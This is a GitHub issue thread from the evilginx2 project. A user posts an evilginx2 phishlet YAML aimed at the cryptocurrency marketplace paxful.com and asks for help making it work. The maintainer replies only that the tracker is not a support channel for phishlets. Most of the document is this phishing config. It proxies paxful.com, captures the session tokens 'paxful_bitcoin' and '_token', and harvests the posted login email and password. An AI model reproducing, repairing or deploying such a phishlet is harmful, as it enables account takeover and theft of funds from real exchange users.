### ISSUE TITLE
Need help with this YAML

### ISSUE THREAD

**Issue by xviiixxix** [kgretzky/evilginx2#269]
I just tried to build this Paxful but i can't seem to make it work, someone please help me out.

=============

author: '@xviii'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'paxful', orig_sub: '', domain: 'paxful.com', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'paxful.com', orig_sub: '', domain: 'paxful.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: 'paxful.com'
    keys: ['paxful_bitcoin','_token']
credentials:
  username:
    key: 'login_email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'login_password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'paxful.com'
  path: '/login'

**Comment by kgretzky** [comment]
This is not a support channel for creating phishlets. Kthxbye.
